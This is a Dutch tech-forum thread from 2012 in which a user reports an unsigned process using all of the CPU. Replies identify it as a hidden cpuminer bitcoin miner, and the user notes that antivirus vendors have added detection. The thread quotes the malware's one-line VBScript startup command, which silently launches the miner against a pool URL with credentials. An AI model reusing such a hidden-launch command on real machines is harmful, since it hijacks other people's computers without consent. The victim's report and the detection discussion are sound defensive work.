Toon posts:

BitCoin virus

Pagina: 1
Acties:
  • 1.297 views

Onderwerpen

Bitcoin Virus

maandag 18 juni 2012 22:52

Acties:
  • The_Worst
  • Registratie: November 2005
  • Laatst online: 23:30

The_Worst

Unox

Topicstarter
Het viel me de laatste dagen op dat er een proces, mscfn.exe, constant de processor volledig belastte. Ik dacht eerst dat het onderdeel was van Windows Update maar het programma bleef maar draaien. Later bleek ook dat het programma niet was ondertekend.

Programma wordt gestart vanuit de map 'opstarten' met een Visual Basic-script:
VBScript:
1

WScript.CreateObject( "WScript.Shell" ).Run "mscnf.exe --url http://eu-proxy.ecki.net:7332 --userpass wotan.4:x --quiet -r -1",0,0


Nu is er vrij weinig informatie te vinden hierover. VirusTotal heeft 6 hits. De URL die in het script staat verwijst naar een BitCoin-pool. Het bijbehorend account is al geblokkeerd. Is er een mogelijkheid om erachter te komen hoe dit op het systeem is terecht gekomen en weet iemand misschien of dit echt alleen een bitcoin-virus is?

If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL

dinsdag 19 juni 2012 02:59

Acties:

Verwijderd

Die 6 hits op VirusTotal is een scanresultaat van 31 mei 2012. Mocht je het bestand nog hebben, laat het dan opnieuw analyseren. Denk dat meer AV's het zullen detecteren en dan heb je misschien iets aan die extra informatie

dinsdag 19 juni 2012 03:18

Acties:

Verwijderd

Het is een bitcoin miner - cpuminer 2.1.3 om preciezer te zijn.
Twijfelgeval qua detectie.

dinsdag 19 juni 2012 11:54

Acties:
  • The_Worst
  • Registratie: November 2005
  • Laatst online: 23:30

The_Worst

Unox

Topicstarter
Eset heeft het script inmiddels toegevoegd aan zijn detectie maar mscfn.exe logischerwijs niet.
Thank you for your submission.
The detection for this threat will be included in our next signature update.

MSCtl.vbs - VBS/CoinMiner.A trojan

Regards,

ESET Malware Response Team

If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL

dinsdag 19 juni 2012 16:30

Acties:

Verwijderd

Verwijderd schreef op dinsdag 19 juni 2012 @ 03:18:
Het is een bitcoin miner - cpuminer 2.1.3 om preciezer te zijn.
Twijfelgeval qua detectie.
Lijkt erop dat deze variant alleen bij 'rogue' installaties opduikt. Detectie is toegevoegd als Trojan.Win32.Miner.du.

maandag 2 februari 2015 13:12

Acties:

Verwijderd

Modbreak:No spam.

[ Voor 97% gewijzigd door F_J_K op 02-02-2015 13:34 ]

Pagina: 1

Dit topic is gesloten.

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq